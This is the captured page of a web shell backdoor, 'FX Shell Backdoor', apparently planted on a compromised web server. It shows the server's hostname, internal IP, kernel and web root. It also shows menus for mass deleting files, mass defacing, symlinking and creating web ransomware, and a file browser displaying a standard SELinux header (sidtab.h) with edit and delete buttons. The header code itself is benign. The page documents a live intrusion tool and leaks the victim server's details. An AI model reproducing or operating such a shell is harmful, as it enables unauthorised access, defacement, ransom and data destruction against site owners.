FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
usr
/
include
/
sepol
/
policydb
/
Upload
Buat File
Buat Folder
Buat Ransomweb
/* Author : Stephen Smalley, <sds@tycho.nsa.gov> */ /* FLASK */ /* * A security identifier table (sidtab) is a hash table * of security context structures indexed by SID value. */ #ifndef _SEPOL_POLICYDB_SIDTAB_H_ #define _SEPOL_POLICYDB_SIDTAB_H_ #include <sepol/policydb/context.h> #ifdef __cplusplus extern "C" { #endif typedef struct sidtab_node { sepol_security_id_t sid; /* security identifier */ context_struct_t context; /* security context structure */ struct sidtab_node *next; } sidtab_node_t; typedef struct sidtab_node *sidtab_ptr_t; #define SIDTAB_HASH_BITS 7 #define SIDTAB_HASH_BUCKETS (1 << SIDTAB_HASH_BITS) #define SIDTAB_HASH_MASK (SIDTAB_HASH_BUCKETS-1) #define SIDTAB_SIZE SIDTAB_HASH_BUCKETS typedef struct { sidtab_ptr_t *htable; unsigned int nel; /* number of elements */ unsigned int next_sid; /* next SID to allocate */ unsigned char shutdown; } sidtab_t; extern int sepol_sidtab_init(sidtab_t * s); extern int sepol_sidtab_insert(sidtab_t * s, sepol_security_id_t sid, context_struct_t * context); extern context_struct_t *sepol_sidtab_search(sidtab_t * s, sepol_security_id_t sid); extern int sepol_sidtab_map(sidtab_t * s, int (*apply) (sepol_security_id_t sid, context_struct_t * context, void *args), void *args); extern void sepol_sidtab_map_remove_on_error(sidtab_t * s, int (*apply) (sepol_security_id_t s, context_struct_t * context, void *args), void *args); extern int sepol_sidtab_context_to_sid(sidtab_t * s, /* IN */ context_struct_t * context, /* IN */ sepol_security_id_t * sid); /* OUT */ extern void sepol_sidtab_hash_eval(sidtab_t * h, char *tag); extern void sepol_sidtab_destroy(sidtab_t * s); extern void sepol_sidtab_set(sidtab_t * dst, sidtab_t * src); extern void sepol_sidtab_shutdown(sidtab_t * s); #ifdef __cplusplus } #endif #endif /* _SIDTAB_H_ */ /* FLASK */
avrule_block.h
Choose...
Edit
Rename
Delete
Now
avtab.h
Choose...
Edit
Rename
Delete
Now
conditional.h
Choose...
Edit
Rename
Delete
Now
constraint.h
Choose...
Edit
Rename
Delete
Now
context.h
Choose...
Edit
Rename
Delete
Now
ebitmap.h
Choose...
Edit
Rename
Delete
Now
expand.h
Choose...
Edit
Rename
Delete
Now
flask.h
Choose...
Edit
Rename
Delete
Now
flask_types.h
Choose...
Edit
Rename
Delete
Now
hashtab.h
Choose...
Edit
Rename
Delete
Now
hierarchy.h
Choose...
Edit
Rename
Delete
Now
link.h
Choose...
Edit
Rename
Delete
Now
mls_types.h
Choose...
Edit
Rename
Delete
Now
module.h
Choose...
Edit
Rename
Delete
Now
polcaps.h
Choose...
Edit
Rename
Delete
Now
policydb.h
Choose...
Edit
Rename
Delete
Now
services.h
Choose...
Edit
Rename
Delete
Now
sidtab.h
Choose...
Edit
Rename
Delete
Now
symtab.h
Choose...
Edit
Rename
Delete
Now
util.h
Choose...
Edit
Rename
Delete
Now